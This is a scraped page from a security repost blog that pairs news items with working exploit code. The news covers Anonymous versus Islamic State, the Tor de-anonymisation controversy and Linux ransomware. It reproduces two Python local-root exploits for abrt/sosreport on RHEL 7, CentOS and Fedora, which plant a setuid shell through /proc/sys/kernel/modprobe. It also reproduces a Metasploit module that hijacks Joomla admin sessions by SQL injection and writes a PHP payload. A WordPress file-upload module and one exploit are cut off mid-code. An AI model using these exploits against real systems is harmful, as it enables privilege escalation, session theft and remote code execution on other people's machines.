MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

4Dec/150

RHEL 7.0 / 7.1 abrt / sosreport Local Root

#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
 
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release 
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
 
import os,sys,glob,time,sys,socket
 
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
 
pid = os.fork()
 
if pid == 0:
    os.execl("/usr/bin/sleep","sleep","100")
 
time.sleep(0.5)
 
print "crashing pid %d" % pid
 
os.kill(pid,11)
 
print "waiting for dump directory"
 
def waitpath(p):
    while 1:
        r = glob.glob(p)
        if len(r) > 0:
            return r
        time.sleep(0.05)    
 
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
 
print "dump directory: ", dumpdir
 
os.chdir(dumpdir)
 
print "waiting for sosreport directory"
 
sosreport = waitpath("sosreport-*")[0]
 
print "sosreport: ", sosreport
 
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
 
print "tmpfiles: ", tmpfiles
 
print "moving directory"
 
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
 
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
 
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
 
print "moving tmpfiles"
 
for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)
 
 
os.chdir("/")
 
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
 
 
def trigger():
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)
    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)
 
for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")
 
print "timed out"

(811)

4Dec/150

CentOS 7.1 / Fedora 22 abrt Local Root

#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
 
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release 
# CentOS Linux release 7.1.1503 (Core) 
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 
 
import time,os,datetime,sys,resource,socket
 
 
fedora = "Fedora" in open("/etc/redhat-release").read()
 
# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2
 
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")
 
if fedora:
    cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")
 
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
 
 
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end
 
# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp
 
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
 
# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)
 
"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
                org     0x08048000
ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1, 0         ;   e_ident
        times 8 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      1                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx
  ehdrsize      equ     $ - ehdr
  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      5                               ;   p_flags
                dd      0x1000                          ;   p_align
  phdrsize      equ     $ - phdr
 
_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message         db      '////////tmp/hax.sh',0x0a,0
msglen          equ     $-message
"""
 
 
 
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]
 
os.chdir("/tmp")
 
 
open("build_ids","w+").write(build_id + "\n")
 
print build_id
 
 
def child():
    timestamp = int(time.time())
 
    for i in xrange(0,3):
        try:
            t = datetime.datetime.fromtimestamp(timestamp+i)
            d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
            os.mkdir(d)
            os.chmod(d,0777)
            os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
            print "created %s" % d
        except: pass
 
    os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
 
try:
    os.mkfifo("/var/tmp/haxfifo")
    os.chmod("/var/tmp/haxfifo",0666)
except:
    pass
 
def fifo(a):
    print "reading from fifo.."
    open("/var/tmp/haxfifo").read()
    print "done"
 
    print "writing to fifo.."
    open("/var/tmp/haxfifo","w+").write(a)
    print "done"
 
if os.fork() == 0: child()
 
print "first cpio..."
fifo(cpio1)
 
os.wait()
time.sleep(1)
 
if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)
 
os.wait()
time.sleep(1)
 
if fedora:
    sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
    sym = "/var/spool/abrt/abrt-hax-coredump"
 
try:
    os.lstat(sym)
except:
    print "could not create symlink"
    sys.exit(-1)
 
print "%s created" % sym
 
open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)
 
if os.fork() == 0:
    resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
    print "executing crashing process.."
    os.execle("/tmp/abrt-hax","",{})
 
os.wait()
time.sleep(1)   
 
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
    print "could not modify /proc/sys/kernel/modprobe"
    sys.exit(-1)
 
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
 
try:
    socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
    pass
 
time.sleep(0.5)
 
try:
    os.stat("/tmp/sh")
except:
    print "could not create suid"
    sys.exit(-1)
 
print "success"
 
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python

(593)

21Nov/150

Joomla Content History SQL Injection Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani', # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
        ], self.class)
 
  end
 
  def check
 
    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
 
  end
 
 
  def sqli( tableprefix )
 
    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
 
    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => '1',
        'type_id' => '1',
        'list[select]' => sql
        }
      })
 
    return res
 
  end
 
 
  def exploit
 
    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end
 
    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")
 
    if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
    })
 
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end
 
    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";"
 
    # Authenticated session
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie
      })
 
    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end
 
 
    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'templates'
        }
      })
 
    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end
 
    filename = rand_text_alphanumeric(rand(10)+6)
 
    # Create file
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'task' => 'template.createFile',
        'id' => template_id,
        'file' => file_id,
        },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
      })
 
    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )
 
      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end
 
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end
 
    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end
 
    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
 
    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'template',
        'id' => template_id,
        'file' => filename_base64,
        },
      'vars_post' => {
        'jform[source]' => payload.encoded,
        'task' => 'template.apply',
        token => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]' => "/#{filename}.php"
      }
      })
 
    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
    end
 
    # Request payload
    register_files_for_cleanup("#{filename}.php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
      'cookie'  => auth_cookie
    })
 
  end
 
end

(1961)

18Nov/150

Anonymous ‘declares war’ on Islamic State

Anonymous 'declares war' on Islamic State

Anonymous is promising its "biggest operation ever" against Islamic State militants (IS).

The hacking group's "declared war" against the extremists after the attacks in Paris on Friday.
In a YouTube video, a spokesman wearing the group's signature mask said they would use their knowledge to "unite humanity".
Speaking French he warned IS members to "expect us", saying "Anonymous from all over the world will hunt you down".

The group made similar threats after the Charlie Hebdo attacks in France earlier this year.
It's since claimed to have disabled thousands of IS-linked social media accounts.
So what happens now? We've asked technology expert Dan Simmons from BBC Click and Charlie Winter, a security analyst specialising in IS, to shed some light.

What does 'declaring war' mean?

"It means we're likely to see attacks on the IS website, any related websites, recruitment sites, social media and if Anonymous goes down the hacking route this time, it could mean communications disrupted too," says Dan.
"They'll also be reporting accounts sympathetic to IS to social media firms and they're encouraging members of the public to help," he adds.

Charlie says it's all about "disrupting" IS.

"In the past its been limited to getting accounts suspended, getting content taken down, identifying IP addresses," he says.
"But it's disruption rather than meaningful challenge. It won't solve the problem. It'll be interesting to see if it goes further than they have before."

How badly could this hurt IS?

"It won't solve the problem," says Charlie. "But as a disruptive influence it does help close down some of the IS publicity machine."
"The big recruitment accounts usually pop back up quickly but it's important to challenge the spaces these people have monopolised.
"These accounts are very important for IS."

But Dan thinks Anonymous has the potential to cause more disruption than it has in the past.

"It depends how much time IS members have got. Are they going to be putting up their website again and are they going to be putting up their social media again?
"If so, who is more resilient, them or Anonymous?" he asks.
"The hackers have said in their statement they will vigorously attack and they will attack without end. So yes, they can put their sites back up but it's a huge amount of disruption."

Could it make things more difficult for the security services?

"This action will concern the security services," claims Dan.
"Security officials can take down any website - but they don't. And that's because they're able to track people who use them.
"Those people who are most serious - potential attackers - will usually manipulate their computer's identities to avoid detection.
"But having these sites removed could mean missing an opportunity to flag extremists at an early stage."

Charlie doesn't think security services will be too worried though.

"It's very rare you get decent intelligence among people tweeting or speaking openly," he says.
Is Anonymous just looking for its own publicity?

Charlie believes there's "real intent there to damage IS".

"Having seen them declare this war a number of times, there is a surge of activity after," he says.
"They do gather a lot of dangerous accounts and have them suspended so I think it's really positive."

Fonte: http://www.bbc.co.uk/newsbeat/article/34836400/anonymous-declares-war-on-islamic-state
(2015)

17Nov/150

Traduttore Google, eliminato ‘Inchallah’

Traduttore Google, eliminato Inchallah

(ANSA) - ROMA, 16 NOV
E' stata riparata l'anomalia di Google Translate, che lunedì pomeriggio traduceva dall'italiano in qualsiasi lingua la frase "Ci rivedremo presto" con "Inchallah", parola araba che sta per "sia fatta la volontà di Allah".
Lo conferma un portavoce di Google Italia.
Nessun dettaglio è stato fornito sulle cause dell'evento, né da dove si sia originato.

Fonte: ANSA / http://tecnologia.tiscali.it
(818)

16Nov/150

Why the attack on Tor matters

Why the attack on Tor matters

On Wednesday, Motherboard posted a court document filed in a prosecution against a Silk Road 2.0 user indicating that the user had been de-anonymized on the Tor network thanks to research conducted by a "university-based research institute."

As Motherboard pointed out, the timing of this research lines up with an active attack on the Tor network that was discovered and publicized in July 2014. Moreover, the details of that attack were eerily similar to the abstract of a (withdrawn) BlackHat presentation submitted by two researchers at the CERT division of Carnegie Mellon University (CMU).

A few hours later, the Tor Project made the allegations more explicit, posting a blog entry accusing CMU of accepting $1 million to conduct the attack. A spokesperson for CMU didn't exactly deny the allegations but demanded better evidence and stated that he wasn't aware of any payment. No doubt we'll learn more in the coming weeks as more documents become public.

You might wonder why this is important. After all, the crimes we're talking about are pretty disturbing. One defendant is accused of possessing child pornography, and if the allegations are true, the other was a staff member on Silk Road 2.0. If CMU really did conduct Tor de-anonymization research for the benefit of the FBI, the people they identified were allegedly not doing the nicest things. It's hard to feel particularly sympathetic.

Except for one small detail: there's no reason to believe that the defendants were the only people affected.

If the details of the attack are as we understand them, a group of academic researchers deliberately took control of a significant portion of the Tor network. Without oversight from the University research board, they exploited a vulnerability in the Tor protocol to conduct a traffic confirmation attack, which allowed them to identify Tor client IP addresses and hidden services. They ran this attack for five months and potentially de-anonymized thousands of users.

It's quite possible that these researchers exercised strict protocols to ensure that they didn't accidentally de-anonymize innocent bystanders. This would be standard procedure in any legitimate research involving human subjects, particularly research that has the potential to harm. If the researchers did take such steps, it would be nice to know about them. CMU hasn't even admitted to the scope of the research project, nor has it published any results, so we just don't know.

While most of the computer science researchers I know are fundamentally ethical people, as a community we have a blind spot when it comes to the ethical issues in our field. There's a view in our community that Institutional Review Boards are for medical researchers, and we've somehow been accidentally caught up in machinery that wasn't meant for us. And I get this—IRBs are unpleasant to work with. Sometimes the machinery is wrong.

But there's also a view that computer security research can't really hurt people, so there's no real reason for this sort of ethical oversight machinery in the first place. This is dead wrong, and if we want to be taken seriously as a mature field, we need to do something about it.

We may need different machinery, but we need something. That something begins with the understanding that active attacks that affect vulnerable users can be dangerous and should never be conducted without rigorous oversight—if they must be conducted at all. It begins with the idea that universities should have uniform procedures for both faculty researchers and quasi-government organizations like CERT if they live under the same roof. It begins with CERT and CMU explaining what went on with their research rather than treating it like an embarrassment to be swept under the rug.

Most importantly, it begins with researchers looking beyond their own research practices. So far, the response to the Tor news has been a big shrug. It's wonderful that most of our community is responsible. But that doesn't matter if we're willing to look the other way when people in our community aren't.

Fonte: http://arstechnica.com/security/2015/11/why-the-attack-on-tor-matters/
(847)

15Nov/150

More ransomware shenanigans

More ransomware shenanigans

Recently, an update of the infamous CryptoWall ransomware (or cryptoware) was released - you can read more about that particular ransomwere here: CryptoWall 4.0 released with new Features such as Encrypted File Names

Additionally, another ransomware variant has made a return, read more about that one here:
“Offline” Ransomware Encrypts Your Data without C&C Communication

And let's not forget about this one either: Chimera Ransomware focuses on business computers

Did I mention yet there's ransomware for Linux as well? Have a look at Linux.Encoder.1 while you're at it.

... But wait, there's more! You've guessed it, yet another ransomware variant has returned. I wonder what's going on these days, the (cyber)criminals seem to get even more competitive.

Lawrence Abrams over at Bleeping Computer recently wrote an article about the variant we have here as well, as we have caught an updated variant of Poshcoder or Poshkoder or Power Worm:
Shoddy Programming causes new Ransomware to destroy your Data

Fonte: http://bartblaze.blogspot.it/2015/11/more-ransomware-shenanigans.html
(905)

14Nov/150

Linux Crypto Ransomware Issue Hits 40,000 Sites

Linux Crypto Ransomware Issue Hits 40,000 Sites

RUSSIAN ANTIVIRUS OUTFIT Dr Web has carried on studying the Linux.Encoder.1 trojan threat and reported some more bad news about increased infection.

The firm revealed the problem already, but now it has more information. While before we spoke of infected parties that ran into the tens, now, we have a lot more zeroes to deal with and a bigger picture to look at.

"The attack scheme shows that cybercriminals do not actually need root privileges to compromise web servers running Linux and encrypt files," explained the firm.

"Moreover, the Trojan still poses a serious threat to Internet resources owners, especially taking into account that many popular CMSes have unfixed vulnerabilities, and some webmasters either disregard the necessity of timely updates or just use outdated versions of CMSes."

According to the studies there might be as many as 2,000 impacted sites, each with various degrees of threat. That was yesterday, we have carried out the same research, a Google search for "README_FOR_DECRYPT.txt" and found that the number of results is now in the 40,000 region.

According to the studies there might be as many as 2,000 impacted sites, each with various degrees of threat. Dr Web said that the exploit has flaws, and recommended that no one attempt to deal with the encrypted files, or the hijackers. Rather, starts the advice, you should call the police.

Last week the firm was warning that so far tens of users have fallen victim to infection. Infected parties are webmasters, and the files are those associated with the serving of webpages.

"Judging from the directories in which the Trojan encrypts files, one can draw a conclusion that the main target of cybercriminals is website administrators whose machines have web servers deployed on," it said.

"There have been some cases, when virus makers exploited the CMS Magento vulnerability to launch attacks on web servers. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan."

Once Linux.Encoder.1 is onboard –Dr Web would not reveal how that happens – it downloads extra files, and grabs out at RSA keys. After that, things get really bad.

"Once launched with administrator privileges, the Trojan dubbed Linux.Encoder.1 downloads files containing cybercriminals' demands and a file with the path to a public RSA key. After that, the malicious program starts as a daemon and deletes the original files," added the firm.

"Subsequently, the RSA key is used to store AES keys, which will be employed by the Trojan to encrypt files on the infected computer."

The Trojan makes merry through a Linux system encrypting all of the files in directories that it comes across. In case its intention is not clear, it marks files as encrypted and sets out its demands.

"First, Linux.Encoder.1 encrypts all files in home directories and directories related to website administration. Then the Trojan recursively traverses the whole file system starting with the directory from which it is launched; next time, starting with a root directory ("/"). At that, the Trojan encrypts only files with specified extensions and only if a directory name starts with one of the strings indicated by cybercriminals," added the company.

"Compromised files are appended by the malware with the .encrypted extension. Into every directory that contains encrypted files, the Trojan plants a file with a ransom demand – to have their files decrypted, the victim must pay a ransom in the Bitcoin electronic currency."

The ransom demand is for the comparably low sum of one bitcoin, which is a few hundred dollars.

Fonte: http://www.theinquirer.net/inquirer/news/2433914/linux-webmasters-hit-with-encryption-ransomware-issue

(957)

13Nov/150

WordPress Ajax Load More PHP Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress Ajax Load More
        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send an PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))
 
    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end
 
  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end
 
  def username
    datastore['WP_USERNAME']
  end
 
  def password
    datastore['WP_PASSWORD']
  end
 
  def get_nonce(cookie)
    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get'  => {
        'page'    => 'ajax-load-more-repeaters'
      },
      'cookie'    => cookie
    )
 
    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end
 
  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
 
    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
 
